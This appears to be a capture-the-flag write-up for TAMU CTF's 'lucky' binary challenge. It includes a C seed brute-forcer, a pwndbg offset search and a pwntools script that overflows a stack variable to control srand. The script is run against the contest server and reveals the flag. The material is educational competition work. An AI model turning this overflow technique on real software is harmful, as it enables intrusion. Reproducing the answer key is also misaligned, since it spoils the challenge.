Tags: pwn 

Rating: 5.0

## Solution

I just wrote a small C program to dertermine the value we needed to overwrite the seed with.

```c
int main() {

setvbuf(stdout, NULL, _IONBF, 0);

int i = 0;

while (1==1) {

srand(i);
int key0 = rand() == 306291429;
int key1 = rand() == 442612432;
int key2 = rand() == 110107425;

if (key0 && key1 && key2) {
printf("seed = %i",i);
exit(0);
}
else {
i = i +1;
}
}
}
```

Running, tells us the seed must equal ```5649426```

```
$ gcc -o luck luck.c
$ ./luck
seed = 5649426

```

We will use this value to overwrite the local variable returned from seed into (e\|r)ax.

```
0x00005555555552e4 <+53>: call 0x5555555551f1 <seed>
0x00005555555552e9 <+58>: mov edi,eax
0x00005555555552eb <+60>: call 0x555555555060 <srand@plt>
0x00005555555552f0 <+65>: call 0x5555555550a0 <rand@plt>
```

Next, I set a breakpoint at ```0x5555555552e9``` to determine how many bytes of padding are needed to overwrite ```eax```.

```
pwndbg> break *0x00005555555552e9
Breakpoint 1 at 0x5555555552e9
pwndbg> cyclic 25
aaaabaaacaaadaaaeaaafaaag
pwndbg> r
Starting program: /root/workspace/tamu-ctf/lucky/lucky
Enter your name: aaaabaaacaaadaaaeaaafaaag
pwndbg> x/8 $rax
0x616164: Cannot access memory at address 0x616164
```

We see that it takes 12 bytes. So the solution now is pretty straightforward, pad 12 bytes, then overflow the local variable in seed() with 5649426.

```python
from pwn import *
import time

binary = args.BIN

context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)
r = ROP(e)

gs = '''
continue
'''

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote("tamuctf.com", 443, ssl=True, sni="lucky")
else:
return process(e.path)

p = start()

pad = b'A'*12
seed = p64(5649426)

p.sendline(pad+seed)
p.interactive()
```

Running this gives our flag

```
{6:15}~/workspace/tamu-ctf/lucky ➭ python3 pwn-lucky.py BIN=./lucky REMOTE
[*] '/root/workspace/tamu-ctf/lucky/lucky'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[*] Loading gadgets for '/root/workspace/tamu-ctf/lucky/lucky'
[+] Opening connection to tamuctf.com on port 443: Done
[*] Switching to interactive mode
Enter your name:
Welcome, AAAAAAAAAAAA\x12V
If you're super lucky, you might get a flag! GLHF :D
Nice work! Here's the flag: gigem{un1n1t14l1z3d_m3m0ry_15_r4nd0m_r1ght}
```

Original writeup (https://github.com/tj-oconnor/ctf-writeups/tree/main/tamu_ctf/lucky).